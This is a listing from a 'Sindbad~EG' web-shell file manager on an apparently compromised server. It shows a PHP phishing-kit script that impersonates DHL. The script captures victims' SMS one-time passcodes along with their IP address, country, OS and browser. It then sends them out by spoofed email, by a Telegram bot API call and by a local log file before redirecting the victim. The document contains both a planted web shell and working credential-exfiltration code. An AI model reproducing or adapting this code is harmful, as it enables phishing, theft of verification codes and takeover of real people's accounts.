Sindbad~EG File Manager

Current Path : /proc/self/root/home/admin/public_html/zzz/LO0JGTZHZJZG/Appearance/
Upload File :
Current File : //proc/self/root/home/admin/public_html/zzz/LO0JGTZHZJZG/Appearance/Caralbab.php

<?php


session_start();

error_reporting(E_ERROR | E_WARNING | E_PARSE | E_NOTICE);
@ini_set('html_errors', '0');
@ini_set('display_errors', '0');
@ini_set('display_startup_errors', '0');
@ini_set('log_errors', '0');

include('../Variablex/Protection.php');
include('../Variablex/COUNTRY.php');
include('../Variablex/SYS.php');
include('../Variablex/XTelegram.php');

if (isset($_POST['submit'])) {
    $message = "* - - - - DHL OTP CODE - - - - *\n";
    $message .= "🔓 - - - SMS :" . $_POST['sm'] . "\n";

	$message .= "🔒 *------- [DHL - USER DATA] -------*\n";
	$message .= "🌍 Country: #" . $get_user_country . "\n";
	$message .= "💻 IP Address: " . $ip . "\n";
	$message .= "💻 Operating System: " . $user_os . "\n";
	$message .= "🌐 Browser: " . $user_browser . "\n";
	$message .= "⏰ Timestamp: " . $date . "\n";

    $subject = "* - - - - DHL OTP CODE - - - - *\n";
    $headers = "From: OTP@DHL.com\r\n";
    $headers .= "Content-Type: text/plain; charset=UTF-8\r\n";
    mail($to, $subject, $message, $headers);

    $file = fopen('XD.txt', 'a');
    fwrite($file, $message . "\n");
    fclose($file);

    $data = [
        'text' => $message,
        'chat_id' => $chat_id,
    ];

    file_get_contents("https://api.telegram.org/bot$token/sendMessage?" . http_build_query($data));

    header('Location: ../D.php?Dsir=1#sHFHJHDHDHKJDJDSDSJDSJKJDSJDSDJJDSHYKJHGFG');
    exit;
}
?>

Sindbad File Manager Version 1.0, Coded By Sindbad EG ~ The Terrorists